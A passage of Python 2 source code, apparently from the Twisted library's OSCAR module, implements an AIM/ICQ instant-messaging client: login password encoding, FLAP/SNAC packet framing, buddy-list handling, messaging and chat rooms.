m.update(md5(password).digest()) m.update("AOL Instant Messenger (SM)") return m.digest() def encryptPasswordICQ(password): key=[0xF3,0x26,0x81,0xC4,0x39,0x86,0xDB,0x92,0x71,0xA3,0xB9,0xE6,0x53,0x7A,0x95,0x7C] bytes=map(ord,password) r="" for i in range(len(bytes)): r=r+chr(bytes[i]^key[i%len(key)]) return r def dehtml(text): text=string.replace(text,"<br>","\n") text=string.replace(text,"<BR>","\n") text=string.replace(text,"<Br>","\n") # XXX make this a regexp text=string.replace(text,"<bR>","\n") text=re.sub('<.*?>','',text) text=string.replace(text,'&gt;','>') text=string.replace(text,'&lt;','<') text=string.replace(text,'&nbsp;',' ') text=string.replace(text,'&#34;','"') text=string.replace(text,'&amp;','&') return text def html(text): text=string.replace(text,'"','&#34;') text=string.replace(text,'&','&amp;') text=string.replace(text,'<','&lt;') text=string.replace(text,'>','&gt;') text=string.replace(text,"\n","<br>") return '<html><body bgcolor="white"><font color="black">%s</font></body></html>'%text class OSCARUser: def __init__(self, name, warn, tlvs): self.name = name self.warning = warn self.flags = [] self.caps = [] for k,v in tlvs.items(): if k == 1: # user flags v=struct.unpack('!H',v)[0] for o, f in [(1,'trial'), (2,'unknown bit 2'), (4,'aol'), (8,'unknown bit 4'), (16,'aim'), (32,'away'), (1024,'activebuddy')]: if v&o: self.flags.append(f) elif k == 2: # member since date self.memberSince = struct.unpack('!L',v)[0] elif k == 3: # on-since self.onSince = struct.unpack('!L',v)[0] elif k == 4: # idle time self.idleTime = struct.unpack('!H',v)[0] elif k == 5: # unknown pass elif k == 6: # icq online status if v[2] == '\x00': self.icqStatus = 'online' elif v[2] == '\x01': self.icqStatus = 'away' elif v[2] == '\x02': self.icqStatus = 'dnd' elif v[2] == '\x04': self.icqStatus = 'out' elif v[2] == '\x10': self.icqStatus = 'busy' else: self.icqStatus = 'unknown' elif k == 10: # icq ip address self.icqIPaddy = socket.inet_ntoa(v) elif k == 12: # icq random stuff self.icqRandom = v elif k == 13: # capabilities caps=[] while v: c=v[:16] if c==CAP_ICON: caps.append("icon") elif c==CAP_IMAGE: caps.append("image") elif c==CAP_VOICE: caps.append("voice") elif c==CAP_CHAT: caps.append("chat") elif c==CAP_GET_FILE: caps.append("getfile") elif c==CAP_SEND_FILE: caps.append("sendfile") elif c==CAP_SEND_LIST: caps.append("sendlist") elif c==CAP_GAMES: caps.append("games") else: caps.append(("unknown",c)) v=v[16:] caps.sort() self.caps=caps elif k == 14: pass elif k == 15: # session length (aim) self.sessionLength = struct.unpack('!L',v)[0] elif k == 16: # session length (aol) self.sessionLength = struct.unpack('!L',v)[0] elif k == 30: # no idea pass else: log.msg("unknown tlv for user %s\nt: %s\nv: %s"%(self.name,k,repr(v))) def __str__(self): s = '<OSCARUser %s' % self.name o = [] if self.warning!=0: o.append('warning level %s'%self.warning) if hasattr(self, 'flags'): o.append('flags %s'%self.flags) if hasattr(self, 'sessionLength'): o.append('online for %i minutes' % (self.sessionLength/60,)) if hasattr(self, 'idleTime'): o.append('idle for %i minutes' % self.idleTime) if self.caps: o.append('caps %s'%self.caps) if o: s=s+', '+', '.join(o) s=s+'>' return s class SSIGroup: def __init__(self, name, tlvs = {}): self.name = name #self.tlvs = [] #self.userIDs = [] self.usersToID = {} self.users = [] #if not tlvs.has_key(0xC8): return #buddyIDs = tlvs[0xC8] #while buddyIDs: # bid = struct.unpack('!H',buddyIDs[:2])[0] # buddyIDs = buddyIDs[2:] # self.users.append(bid) def findIDFor(self, user): return self.usersToID[user] def addUser(self, buddyID, user): self.usersToID[user] = buddyID self.users.append(user) user.group = self def oscarRep(self, groupID, buddyID): tlvData = TLV(0xc8, reduce(lambda x,y:x+y, [struct.pack('!H',self.usersToID[x]) for x in self.users])) return struct.pack('!H', len(self.name)) + self.name + \ struct.pack('!HH', groupID, buddyID) + '\000\001' + tlvData class SSIBuddy: def __init__(self, name, tlvs = {}): self.name = name self.tlvs = tlvs for k,v in tlvs.items(): if k == 0x013c: # buddy comment self.buddyComment = v elif k == 0x013d: # buddy alerts actionFlag = ord(v[0]) whenFlag = ord(v[1]) self.alertActions = [] self.alertWhen = [] if actionFlag&1: self.alertActions.append('popup') if actionFlag&2: self.alertActions.append('sound') if whenFlag&1: self.alertWhen.append('online') if whenFlag&2: self.alertWhen.append('unidle') if whenFlag&4: self.alertWhen.append('unaway') elif k == 0x013e: self.alertSound = v def oscarRep(self, groupID, buddyID): tlvData = reduce(lambda x,y: x+y, map(lambda (k,v):TLV(k,v), self.tlvs.items()), '\000\000') return struct.pack('!H', len(self.name)) + self.name + \ struct.pack('!HH', groupID, buddyID) + '\000\000' + tlvData class OscarConnection(protocol.Protocol): def connectionMade(self): self.state="" self.seqnum=0 self.buf='' self.stopKeepAliveID = None self.setKeepAlive(4*60) # 4 minutes def connectionLost(self, reason): log.msg("Connection Lost! %s" % self) self.stopKeepAlive() # def connectionFailed(self): # log.msg("Connection Failed! %s" % self) # self.stopKeepAlive() def sendFLAP(self,data,channel = 0x02): header="!cBHH" self.seqnum=(self.seqnum+1)%0xFFFF seqnum=self.seqnum head=struct.pack(header,'*', channel, seqnum, len(data)) self.transport.write(head+str(data)) # if isinstance(self, ChatService): # logPacketData(head+str(data)) def readFlap(self): header="!cBHH" if len(self.buf)<6: return flap=struct.unpack(header,self.buf[:6]) if len(self.buf)<6+flap[3]: return data,self.buf=self.buf[6:6+flap[3]],self.buf[6+flap[3]:] return [flap[1],data] def dataReceived(self,data): # if isinstance(self, ChatService): # logPacketData(data) self.buf=self.buf+data flap=self.readFlap() while flap: func=getattr(self,"oscar_%s"%self.state,None) if not func: log.msg("no func for state: %s" % self.state) state=func(flap) if state: self.state=state flap=self.readFlap() def setKeepAlive(self,t): self.keepAliveDelay=t self.stopKeepAlive() self.stopKeepAliveID = reactor.callLater(t, self.sendKeepAlive) def sendKeepAlive(self): self.sendFLAP("",0x05) self.stopKeepAliveID = reactor.callLater(self.keepAliveDelay, self.sendKeepAlive) def stopKeepAlive(self): if self.stopKeepAliveID: self.stopKeepAliveID.cancel() self.stopKeepAliveID = None def disconnect(self): """ send the disconnect flap, and sever the connection """ self.sendFLAP('', 0x04) def f(reason): pass self.connectionLost = f self.transport.loseConnection() class SNACBased(OscarConnection): snacFamilies = { # family : (version, toolID, toolVersion) } def __init__(self,cookie): self.cookie=cookie self.lastID=0 self.supportedFamilies = () self.requestCallbacks={} # request id:Deferred def sendSNAC(self,fam,sub,data,flags=[0,0]): """ send a snac and wait for the response by returning a Deferred. """ reqid=self.lastID self.lastID=reqid+1 d = defer.Deferred() d.reqid = reqid #d.addErrback(self._ebDeferredError,fam,sub,data) # XXX for testing self.requestCallbacks[reqid] = d self.sendFLAP(SNAC(fam,sub,reqid,data)) return d def _ebDeferredError(self, error, fam, sub, data): log.msg('ERROR IN DEFERRED %s' % error) log.msg('on sending of message, family 0x%02x, subtype 0x%02x' % (fam, sub)) log.msg('data: %s' % repr(data)) def sendSNACnr(self,fam,sub,data,flags=[0,0]): """ send a snac, but don't bother adding a deferred, we don't care. """ self.sendFLAP(SNAC(fam,sub,0x10000*fam+sub,data)) def oscar_(self,data): self.sendFLAP("\000\000\000\001"+TLV(6,self.cookie), 0x01) return "Data" def oscar_Data(self,data): snac=readSNAC(data[1]) if self.requestCallbacks.has_key(snac[4]): d = self.requestCallbacks[snac[4]] del self.requestCallbacks[snac[4]] if snac[1]!=1: d.callback(snac) else: d.errback(snac) return func=getattr(self,'oscar_%02X_%02X'%(snac[0],snac[1]),None) if not func: self.oscar_unknown(snac) else: func(snac[2:]) return "Data" def oscar_unknown(self,snac): log.msg("unknown for %s" % self) log.msg(snac) def oscar_01_03(self, snac): numFamilies = len(snac[3])/2 self.supportedFamilies = struct.unpack("!"+str(numFamilies)+'H', snac[3]) d = '' for fam in self.supportedFamilies: if self.snacFamilies.has_key(fam): d=d+struct.pack('!2H',fam,self.snacFamilies[fam][0]) self.sendSNACnr(0x01,0x17, d) def oscar_01_0A(self,snac): """ change of rate information. """ # this can be parsed, maybe we can even work it in pass def oscar_01_18(self,snac): """ host versions, in the same format as we sent """ self.sendSNACnr(0x01,0x06,"") #pass def clientReady(self): """ called when the client is ready to be online """ d = '' for fam in self.supportedFamilies: if self.snacFamilies.has_key(fam): version, toolID, toolVersion = self.snacFamilies[fam] d = d + struct.pack('!4H',fam,version,toolID,toolVersion) self.sendSNACnr(0x01,0x02,d) class BOSConnection(SNACBased): snacFamilies = { 0x01:(3, 0x0110, 0x059b), 0x13:(3, 0x0110, 0x059b), 0x02:(1, 0x0110, 0x059b), 0x03:(1, 0x0110, 0x059b), 0x04:(1, 0x0110, 0x059b), 0x06:(1, 0x0110, 0x059b), 0x08:(1, 0x0104, 0x0001), 0x09:(1, 0x0110, 0x059b), 0x0a:(1, 0x0110, 0x059b), 0x0b:(1, 0x0104, 0x0001), 0x0c:(1, 0x0104, 0x0001) } capabilities = None def __init__(self,username,cookie): SNACBased.__init__(self,cookie) self.username=username self.profile = None self.awayMessage = None self.services = {} if not self.capabilities: self.capabilities = [CAP_CHAT] def parseUser(self,data,count=None): l=ord(data[0]) name=data[1:1+l] warn,foo=struct.unpack("!HH",data[1+l:5+l]) warn=int(warn/10) tlvs=data[5+l:] if count: tlvs,rest = readTLVs(tlvs,foo) else: tlvs,rest = readTLVs(tlvs), None u = OSCARUser(name, warn, tlvs) if rest == None: return u else: return u, rest def oscar_01_05(self, snac, d = None): """ data for a new service connection d might be a deferred to be called back when the service is ready """ tlvs = readTLVs(snac[3][2:]) service = struct.unpack('!H',tlvs[0x0d])[0] ip = tlvs[5] cookie = tlvs[6] #c = serviceClasses[service](self, cookie, d) c = protocol.ClientCreator(reactor, serviceClasses[service], self, cookie, d) def addService(x): self.services[service] = x c.connectTCP(ip, 5190).addCallback(addService) #self.services[service] = c def oscar_01_07(self,snac): """ rate paramaters """ self.sendSNACnr(0x01,0x08,"\x00\x01\x00\x02\x00\x03\x00\x04\x00\x05") # ack self.initDone() self.sendSNACnr(0x13,0x02,'') # SSI rights info self.sendSNACnr(0x02,0x02,'') # location rights info self.sendSNACnr(0x03,0x02,'') # buddy list rights self.sendSNACnr(0x04,0x04,'') # ICBM parms self.sendSNACnr(0x09,0x02,'') # BOS rights def oscar_01_10(self,snac): """ we've been warned """ skip = struct.unpack('!H',snac[3][:2])[0] newLevel = struct.unpack('!H',snac[3][2+skip:4+skip])[0]/10 if len(snac[3])>4+skip: by = self.parseUser(snac[3][4+skip:]) else: by = None self.receiveWarning(newLevel, by) def oscar_01_13(self,snac): """ MOTD """ pass # we don't care for now def oscar_02_03(self, snac): """ location rights response """ tlvs = readTLVs(snac[3]) self.maxProfileLength = tlvs[1] def oscar_03_03(self, snac): """ buddy list rights response """ tlvs = readTLVs(snac[3]) self.maxBuddies = tlvs[1] self.maxWatchers = tlvs[2] def oscar_03_0B(self, snac): """ buddy update """ self.updateBuddy(self.parseUser(snac[3])) def oscar_03_0C(self, snac): """ buddy offline """ self.offlineBuddy(self.parseUser(snac[3])) # def oscar_04_03(self, snac): def oscar_04_05(self, snac): """ ICBM parms response """ self.sendSNACnr(0x04,0x02,'\x00\x00\x00\x00\x00\x0b\x1f@\x03\xe7\x03\xe7\x00\x00\x00\x00') # IM rights def oscar_04_07(self, snac): """ ICBM message (instant message) """ data = snac[3] cookie, data = data[:8], data[8:] channel = struct.unpack('!H',data[:2])[0] data = data[2:] user, data = self.parseUser(data, 1) tlvs = readTLVs(data) if channel == 1: # message flags = [] multiparts = [] for k, v in tlvs.items(): if k == 2: while v: v = v[2:] # skip bad data messageLength, charSet, charSubSet = struct.unpack('!3H', v[:6]) messageLength -= 4 message = [v[6:6+messageLength]] if charSet == 0: pass # don't add anything special elif charSet == 2: message.append('unicode') elif charSet == 3: message.append('iso-8859-1') elif charSet == 0xffff: message.append('none') if charSubSet == 0xb: message.append('macintosh') if messageLength > 0: multiparts.append(tuple(message)) v = v[6+messageLength:] elif k == 3: flags.append('acknowledge') elif k == 4: flags.append('auto') elif k == 6: flags.append('offline') elif k == 8: iconLength, foo, iconSum, iconStamp = struct.unpack('!LHHL',v) if iconLength: flags.append('icon') flags.append((iconLength, iconSum, iconStamp)) elif k == 9: flags.append('buddyrequest') elif k == 0xb: # unknown pass elif k == 0x17: flags.append('extradata') flags.append(v) else: log.msg('unknown TLV for incoming IM, %04x, %s' % (k,repr(v))) # unknown tlv for user SNewdorf # t: 29 # v: '\x00\x00\x00\x05\x02\x01\xd2\x04r\x00\x01\x01\x10/\x8c\x8b\x8a\x1e\x94*\xbc\x80}\x8d\xc4;\x1dEM' # XXX what is this? self.receiveMessage(user, multiparts, flags) elif channel == 2: # rondevouz status = struct.unpack('!H',tlvs[5][:2])[0] requestClass = tlvs[5][10:26] moreTLVs = readTLVs(tlvs[5][26:]) if requestClass == CAP_CHAT: # a chat request exchange = struct.unpack('!H',moreTLVs[10001][:2])[0] name = moreTLVs[10001][3:-2] instance = struct.unpack('!H',moreTLVs[10001][-2:])[0] if not self.services.has_key(SERVICE_CHATNAV): self.connectService(SERVICE_CHATNAV,1).addCallback(lambda x: self.services[SERVICE_CHATNAV].getChatInfo(exchange, name, instance).\ addCallback(self._cbGetChatInfoForInvite, user, moreTLVs[12])) else: self.services[SERVICE_CHATNAV].getChatInfo(exchange, name, instance).\ addCallback(self._cbGetChatInfoForInvite, user, moreTLVs[12]) elif requestClass == CAP_SEND_FILE: if moreTLVs.has_key(11): # cancel log.msg('cancelled file request') log.msg(status) return # handle this later name = moreTLVs[10001][9:-7] desc = moreTLVs[12] log.msg('file request from %s, %s, %s' % (user, name, desc)) self.receiveSendFileRequest(user, name, desc, cookie) else: log.msg('unsupported rondevouz: %s' % requestClass) log.msg(repr(moreTLVs)) else: log.msg('unknown channel %02x' % channel) log.msg(tlvs) def _cbGetChatInfoForInvite(self, info, user, message): apply(self.receiveChatInvite, (user,message)+info) def oscar_09_03(self, snac): """ BOS rights response """ tlvs = readTLVs(snac[3]) self.maxPermitList = tlvs[1] self.maxDenyList = tlvs[2] def oscar_0B_02(self, snac): """ stats reporting interval """ self.reportingInterval = struct.unpack('!H',snac[3][:2])[0] def oscar_13_03(self, snac): """ SSI rights response """ #tlvs = readTLVs(snac[3]) pass # we don't know how to parse this # methods to be called by the client, and their support methods def requestSelfInfo(self): """ ask for the OSCARUser for ourselves """ d = defer.Deferred() self.sendSNAC(0x01, 0x0E, '').addCallback(self._cbRequestSelfInfo, d) return d def _cbRequestSelfInfo(self, snac, d): d.callback(self.parseUser(snac[5])) def initSSI(self): """ this sends the rate request for family 0x13 (Server Side Information) so we can then use it """ return self.sendSNAC(0x13, 0x02, '').addCallback(self._cbInitSSI) def _cbInitSSI(self, snac, d): return {} # don't even bother parsing this def requestSSI(self, timestamp = 0, revision = 0): """ request the server side information if the deferred gets None, it means the SSI is the same """ return self.sendSNAC(0x13, 0x05, struct.pack('!LH',timestamp,revision)).addCallback(self._cbRequestSSI) def _cbRequestSSI(self, snac, args = ()): if snac[1] == 0x0f: # same SSI as we have return itemdata = snac[5][3:] if args: revision, groups, permit, deny, permitMode, visibility = args else: version, revision = struct.unpack('!BH', snac[5][:3]) groups = {} permit = [] deny = [] permitMode = None visibility = None while len(itemdata)>4: nameLength = struct.unpack('!H', itemdata[:2])[0] name = itemdata[2:2+nameLength] groupID, buddyID, itemType, restLength = \ struct.unpack('!4H', itemdata[2+nameLength:10+nameLength]) tlvs = readTLVs(itemdata[10+nameLength:10+nameLength+restLength]) itemdata = itemdata[10+nameLength+restLength:] if itemType == 0: # buddies groups[groupID].addUser(buddyID, SSIBuddy(name, tlvs)) elif itemType == 1: # group g = SSIGroup(name, tlvs) if groups.has_key(0): groups[0].addUser(groupID, g) groups[groupID] = g elif itemType == 2: # permit permit.append(name) elif itemType == 3: # deny deny.append(name) elif itemType == 4: # permit deny info if not tlvs.has_key(0xcb): continue # this happens with ICQ permitMode = {1:'permitall',2:'denyall',3:'permitsome',4:'denysome',5:'permitbuddies'}[ord(tlvs[0xca])] visibility = {'\xff\xff\xff\xff':'all','\x00\x00\x00\x04':'notaim'}[tlvs[0xcb]] elif itemType == 5: # unknown (perhaps idle data)? pass else: log.msg('%s %s %s %s %s' % (name, groupID, buddyID, itemType, tlvs)) timestamp = struct.unpack('!L',itemdata)[0] if not timestamp: # we've got more packets coming # which means add some deferred stuff d = defer.Deferred() self.requestCallbacks[snac[4]] = d d.addCallback(self._cbRequestSSI, (revision, groups, permit, deny, permitMode, visibility)) return d return (groups[0].users,permit,deny,permitMode,visibility,timestamp,revision) def activateSSI(self): """ active the data stored on the server (use buddy list, permit deny settings, etc.) """ self.sendSNACnr(0x13,0x07,'') def startModifySSI(self): """ tell the OSCAR server to be on the lookout for SSI modifications """ self.sendSNACnr(0x13,0x11,'') def addItemSSI(self, item, groupID = None, buddyID = None): """ add an item to the SSI server. if buddyID == 0, then this should be a group. this gets a callback when it's finished, but you can probably ignore it. """ if groupID is None: if isinstance(item, SSIGroup): groupID = 0 else: groupID = item.group.group.findIDFor(item.group) if buddyID is None: buddyID = item.group.findIDFor(item) return self.sendSNAC(0x13,0x08, item.oscarRep(groupID, buddyID)) def modifyItemSSI(self, item, groupID = None, buddyID = None): if groupID is None: if isinstance(item, SSIGroup): groupID = 0 else: groupID = item.group.group.findIDFor(item.group) if buddyID is None: buddyID = item.group.findIDFor(item) return self.sendSNAC(0x13,0x09, item.oscarRep(groupID, buddyID)) def delItemSSI(self, item, groupID = None, buddyID = None): if groupID is None: if isinstance(item, SSIGroup): groupID = 0 else: groupID = item.group.group.findIDFor(item.group) if buddyID is None: buddyID = item.group.findIDFor(item) return self.sendSNAC(0x13,0x0A, item.oscarRep(groupID, buddyID)) def endModifySSI(self): self.sendSNACnr(0x13,0x12,'') def setProfile(self, profile): """ set the profile. send None to not set a profile (different from '' for a blank one) """ self.profile = profile tlvs = '' if self.profile is not None: tlvs = TLV(1,'text/aolrtf; charset="us-ascii"') + \ TLV(2,self.profile) tlvs = tlvs + TLV(5, ''.join(self.capabilities)) self.sendSNACnr(0x02, 0x04, tlvs) def setAway(self, away = None): """ set the away message, or return (if away == None) """ self.awayMessage = away tlvs = TLV(3,'text/aolrtf; charset="us-ascii"') + \ TLV(4,away or '') self.sendSNACnr(0x02, 0x04, tlvs) def setIdleTime(self, idleTime): """ set our idle time. don't call more than once with a non-0 idle time. """ self.sendSNACnr(0x01, 0x11, struct.pack('!L',idleTime)) def sendMessage(self, user, message, wantAck = 0, autoResponse = 0, offline = 0 ): \ #haveIcon = 0, ): """ send a message to user (not an OSCARUseR). message can be a string, or a multipart tuple. if wantAck, we return a Deferred that gets a callback when the message is sent. if autoResponse, this message is an autoResponse, as if from an away message. if offline, this is an offline message (ICQ only, I think) """ data = ''.join([chr(random.randrange(0, 127)) for i in range(8)]) # cookie data = data + '\x00\x01' + chr(len(user)) + user if not type(message) in (types.TupleType, types.ListType): message = [[message,]] if type(message[0][0]) == types.UnicodeType: message[0].append('unicode') messageData = '' for part in message: charSet = 0 if 'unicode' in part[1:]: charSet = 2 part[0] = part[0].encode('utf-8') elif 'iso-8859-1' in part[1:]: charSet = 3 part[0] = part[0].encode('iso-8859-1') elif 'none' in part[1:]: charSet = 0xffff if 'macintosh' in part[1:]: charSubSet = 0xb else: charSubSet = 0 messageData = messageData + '\x01\x01' + \ struct.pack('!3H',len(part[0])+4,charSet,charSubSet) messageData = messageData + part[0] data = data + TLV(2, '\x05\x01\x00\x03\x01\x01\x02'+messageData) if wantAck: data = data + TLV(3,'') if autoResponse: data = data + TLV(4,'') if offline: data = data + TLV(6,'') if wantAck: return self.sendSNAC(0x04, 0x06, data).addCallback(self._cbSendMessageAck, user, message) self.sendSNACnr(0x04, 0x06, data) def _cbSendMessageAck(self, snac, user, message): return user, message def connectService(self, service, wantCallback = 0, extraData = ''): """ connect to another service if wantCallback, we return a Deferred that gets called back when the service is online. if extraData, append that to our request. """ if wantCallback: d = defer.Deferred() self.sendSNAC(0x01,0x04,struct.pack('!H',service) + extraData).addCallback(self._cbConnectService, d) return d else: self.sendSNACnr(0x01,0x04,struct.pack('!H',service)) def _cbConnectService(self, snac, d): self.oscar_01_05(snac[2:], d) def createChat(self, shortName): """ create a chat room """ if self.services.has_key(SERVICE_CHATNAV): return self.services[SERVICE_CHATNAV].createChat(shortName) else: return self.connectService(SERVICE_CHATNAV,1).addCallback(lambda s: s.createChat(shortName)) def joinChat(self, exchange, fullName, instance): """ join a chat room """ #d = defer.Deferred() return self.connectService(0x0e, 1, TLV(0x01, struct.pack('!HB',exchange, len(fullName)) + fullName + struct.pack('!H', instance))).addCallback(self._cbJoinChat) #, d) #return d def _cbJoinChat(self, chat): del self.services[SERVICE_CHAT] return chat def warnUser(self, user, anon = 0): return self.sendSNAC(0x04, 0x08, '\x00'+chr(anon)+chr(len(user))+user).addCallback(self._cbWarnUser) def _cbWarnUser(self, snac): oldLevel, newLevel = struct.unpack('!2H', snac[5]) return oldLevel, newLevel def getInfo(self, user): #if user. return self.sendSNAC(0x02, 0x05, '\x00\x01'+chr(len(user))+user).addCallback(self._cbGetInfo) def _cbGetInfo(self, snac): user, rest = self.parseUser(snac[5],1) tlvs = readTLVs(rest) return tlvs.get(0x02,None) def getAway(self, user): return self.sendSNAC(0x02, 0x05, '\x00\x03'+chr(len(user))+user).addCallback(self._cbGetAway) def _cbGetAway(self, snac): user, rest = self.parseUser(snac[5],1) tlvs = readTLVs(rest) return tlvs.get(0x04,None) # return None if there is no away message #def acceptSendFileRequest(self, # methods to be overriden by the client def initDone(self): """ called when we get the rate information, which means we should do other init. stuff. """ log.msg('%s initDone' % self) pass def updateBuddy(self, user): """ called when a buddy changes status, with the OSCARUser for that buddy. """ log.msg('%s updateBuddy %s' % (self, user)) pass def offlineBuddy(self, user): """ called when a buddy goes offline """ log.msg('%s offlineBuddy %s' % (self, user)) pass def receiveMessage(self, user, multiparts, flags): """ called when someone sends us a message """ pass def receiveWarning(self, newLevel, user): """ called when someone warns us. user is either None (if it was anonymous) or an OSCARUser """ pass def receiveChatInvite(self, user, message, exchange, fullName, instance, shortName, inviteTime): """ called when someone invites us to a chat room """ pass def chatReceiveMessage(self, chat, user, message): """ called when someone in a chatroom sends us a message in the chat """ pass def chatMemberJoined(self, chat, member): """ called when a member joins the chat """ pass def chatMemberLeft(self, chat, member): """ called when a member leaves the chat """ pass def receiveSendFileRequest(self, user, file, description, cookie): """ called when someone tries to send a file to us """ pass class OSCARService(SNACBased): def __init__(self, bos, cookie, d = None): SNACBased.__init__(self, cookie) self.bos = bos self.d = d def connectionLost(self, reason): for k,v in self.bos.services.items(): if v == self: del self.bos.services[k] return def clientReady(self): SNACBased.clientReady(self) if self.d: self.d.callback(self) self.d = None class ChatNavService(OSCARService): snacFamilies = { 0x01:(3, 0x0010, 0x059b), 0x0d:(1, 0x0010, 0x059b) } def oscar_01_07(self, snac): # rate info self.sendSNACnr(0x01, 0x08, '\000\001\000\002\000\003\000\004\000\005') self.sendSNACnr(0x0d, 0x02, '') def oscar_0D_09(self, snac): self.clientReady() def getChatInfo(self, exchange, name, instance): d = defer.Deferred() self.sendSNAC(0x0d,0x04,struct.pack('!HB',exchange,len(name)) + \ name + struct.pack('!HB',instance,2)). \ addCallback(self._cbGetChatInfo, d) return d def _cbGetChatInfo(self, snac, d): data = snac[5][4:] exchange, length = struct.unpack('!HB',data[:3]) fullName = data[3:3+length] instance = struct.unpack('!H',data[3+length:5+length])[0] tlvs = readTLVs(data[8+length:]) shortName = tlvs[0x6a] inviteTime = struct.unpack('!L',tlvs[0xca])[0] info = (exchange,fullName,instance,shortName,inviteTime) d.callback(info) def createChat(self, shortName): #d = defer.Deferred() data = '\x00\x04\x06create\xff\xff\x01\x00\x03' data = data + TLV(0xd7, 'en') data = data + TLV(0xd6, 'us-ascii') data = data + TLV(0xd3, shortName) return self.sendSNAC(0x0d, 0x08, data).addCallback(self._cbCreateChat) #return d def _cbCreateChat(self, snac): #d): exchange, length = struct.unpack('!HB',snac[5][4:7]) fullName = snac[5][7:7+length] instance = struct.unpack('!H',snac[5][7+length:9+length])[0] #d.callback((exchange, fullName, instance)) return exchange, fullName, instance class ChatService(OSCARService): snacFamilies = { 0x01:(3, 0x0010, 0x059b), 0x0E:(1, 0x0010, 0x059b) } def __init__(self,bos,cookie, d = None): OSCARService.__init__(self,bos,cookie,d) self.exchange = None self.fullName = None self.instance = None self.name = None self.members = None clientReady = SNACBased.clientReady # we'll do our own callback def oscar_01_07(self,snac): self.sendSNAC(0x01,0x08,"\000\001\000\002\000\003\000\004\000\005") self.clientReady() def oscar_0E_02(self, snac): # try: # this is EVIL # data = snac[3][4:] # self.exchange, length = struct.unpack('!HB',data[:3]) # self.fullName = data[3:3+length] # self.instance = struct.unpack('!H',data[3+length:5+length])[0] # tlvs = readTLVs(data[8+length:]) # self.name = tlvs[0xd3] # self.d.callback(self) # except KeyError: data = snac[3] self.exchange, length = struct.unpack('!HB',data[:3]) self.fullName = data[3:3+length] self.instance = struct.unpack('!H',data[3+length:5+length])[0] tlvs = readTLVs(data[8+length:]) self.name = tlvs[0xd3] self.d.callback(self) def oscar_0E_03(self,snac): users=[] rest=snac[3] while rest: user, rest = self.bos.parseUser(rest, 1) users.append(user) if not self.fullName: self.members = users else: self.members.append(users[0]) self.bos.chatMemberJoined(self,users[0]) def oscar_0E_04(self,snac): user=self.bos.parseUser(snac[3]) for u in self.members: if u.name == user.name: # same person! self.members.remove(u) self.bos.chatMemberLeft(self,user) def oscar_0E_06(self,snac): data = snac[3] user,rest=self.bos.parseUser(snac[3][14:],1) tlvs = readTLVs(rest[8:]) message=tlvs[1] self.bos.chatReceiveMessage(self,user,message) def sendMessage(self,message): tlvs=TLV(0x02,"us-ascii")+TLV(0x03,"en")+TLV(0x01,message) self.sendSNAC(0x0e,0x05, "\x46\x30\x38\x30\x44\x00\x63\x00\x00\x03\x00\x01\x00\x00\x00\x06\x00\x00\x00\x05"+ struct.pack("!H",len(tlvs))+ tlvs) def leaveChat(self): self.disconnect() class OscarAuthenticator(OscarConnection): BOSClass = BOSConnection def __init__(self,username,password,deferred=None,icq=0): self.username=username self.password=password self.deferred=deferred self.icq=icq # icq mode is disabled #if icq and self.BOSClass==BOSConnection: # self.BOSClass=ICQConnection def oscar_(self,flap): if not self.icq: self.sendFLAP("\000\000\000\001", 0x01) self.sendFLAP(SNAC(0x17,0x06,0, TLV(TLV_USERNAME,self.username)+ TLV(0x004B,''))) self.state="Key" else: encpass=encryptPasswordICQ(self.password) self.sendFLAP('\000\000\000\001'+ TLV(0x01,self.username)+ TLV(0x02,encpass)+ TLV(0x03,'ICQ Inc. - Product of ICQ (TM).2001b.5.18.1.3659.85')+ TLV(0x16,"\x01\x0a")+ TLV(0x17,"\x00\x05")+ TLV(0x18,"\x00\x12")+ TLV(0x19,"\000\001")+ TLV(0x1a,"\x0eK")+ TLV(0x14,"\x00\x00\x00U")+ TLV(0x0f,"en")+ TLV(0x0e,"us"),0x01) self.state="Cookie" def oscar_Key(self,data): snac=readSNAC(data[1]) key=snac[5][2:] encpass=encryptPasswordMD5(self.password,key) self.sendFLAP(SNAC(0x17,0x02,0, TLV(TLV_USERNAME,self.username)+ TLV(TLV_PASSWORD,encpass)+ TLV(0x004C, '')+ # unknown TLV(TLV_CLIENTNAME,"AOL Instant Messenger (SM), version 4.8.2790/WIN32")+ TLV(0x0016,"\x01\x09")+ TLV(TLV_CLIENTMAJOR,"\000\004")+ TLV(TLV_CLIENTMINOR,"\000\010")+ TLV(0x0019,"\000\000")+ TLV(TLV_CLIENTSUB,"\x0A\xE6")+ TLV(0x0014,"\x00\x00\x00\xBB")+ TLV(TLV_LANG,"en")+ TLV(TLV_COUNTRY,"us")+ TLV(TLV_USESSI,"\001"))) return "Cookie" def oscar_Cookie(self,data): snac=readSNAC(data[1]) if self.icq: i=snac[5].find("\000") snac[5]=snac[5][i:] tlvs=readTLVs(snac[5]) if tlvs.has_key(6): self.cookie=tlvs[6] server,port=string.split(tlvs[5],":") d = self.connectToBOS(server, int(port)) d.addErrback(lambda x: log.msg("Connection Failed! Reason: %s" % x)) if self.deferred: d.chainDeferred(self.deferred) self.disconnect() elif tlvs.has_key(8): errorcode=tlvs[8] errorurl=tlvs[4] if errorcode=='\000\030': error="You are attempting to sign on again too soon. Please try again later." elif errorcode=='\000\005': error="Invalid Username or Password." else: error=repr(errorcode) self.error(error,errorurl) else: log.msg('hmm, weird tlvs for %s cookie packet' % str(self)) log.msg(tlvs) log.msg('snac') log.msg(str(snac)) return "None" def oscar_None(self,data): pass def connectToBOS(self, server, port): c = protocol.ClientCreator(reactor, self.BOSClass, self.username, self.cookie) return c.connectTCP(server, int(port)) def error(self,error,url): log.msg("ERROR! %s %s" % (error,url)) if self.deferred: self.deferred.errback((error,url)) self.transport.loseConnection() FLAP_CHANNEL_NEW_CONNECTION = 0x01 FLAP_CHANNEL_DATA = 0x02 FLAP_CHANNEL_ERROR = 0x03 FLAP_CHANNEL_CLOSE_CONNECTION = 0x04 SERVICE_CHATNAV = 0x0d SERVICE_CHAT = 0x0e serviceClasses = { SERVICE_CHATNAV:ChatNavService, SERVICE_CHAT:ChatService } TLV_USERNAME = 0x0001 TLV_CLIENTNAME = 0x0003 TLV_COUNTRY = 0x000E TLV_LANG = 0x000F TLV_CLIENTMAJOR = 0x0017 TLV_CLIENTMINOR = 0x0018 TLV_CLIENTSUB = 0x001A TLV_PASSWORD = 0x0025 TLV_USESSI = 0x004A CAP_ICON = '\011F\023FL\177\021\321\202"DEST\000\000' CAP_VOICE = '\011F\023AL\177\021\321\202"DEST\000\000' CAP_IMAGE = '\011F\023EL\177\021\321\202"DEST\000\000' CAP_CHAT = 't\217$ 